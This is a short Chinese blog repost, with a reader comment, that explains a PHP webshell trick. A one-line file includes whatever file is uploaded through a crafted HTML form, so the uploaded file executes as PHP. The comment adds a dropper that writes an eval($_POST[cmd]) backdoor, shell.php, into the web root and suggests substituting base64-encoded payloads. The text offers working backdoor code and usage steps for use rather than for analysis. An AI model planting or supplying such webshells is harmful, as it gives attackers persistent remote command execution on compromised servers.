时间:2014-11-8 作者:admin 分类: 摘自网络
利用了include可以把任何文件当php来解释的特性, 当我们上传一个文件的时候,会在服务器上生成一个临时文件,而$_FILES这个变量里面正好保存了这个文件的路径,所以可以直接include进来。
<?php @include($_FILES['u']['tmp_name']);
<?php @include($_FILES['u']['tmp_name']);
使用方式也简单,构造一个html文件写入如下代码:
<form action="http:/a.b.c.com.cn/shell.php" method="POST" enctype="multipart/form-data"> <input type="file" name='u'> <button>shell</button> </form>
选择你的php大马点shell运行
我测试的时候的代码就是<?php phpinfo();保存的文件名为1.txt。
原文: http://www.zeroplace.cn/article.asp?id=906
评论:
服务器上新建xx.php 其内容为
<?php @include($_FILES['u']['tmp_name']);
然后再在本地建立一个xx.html,内容为
<form action="http:/xxx.com/xx.php" method="POST" enctype="multipart/form-data">
<input type="file" name='u'>
<button>shell</button>
</form>
再在本地新建一个1.php内容为
<?PHP
fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');
?>
打开xx.html,上传1.php,则在网站根目录生成shell.php
执行这个 你自己把base64编码的换成一句话吧,这个是个小马。写出的test.php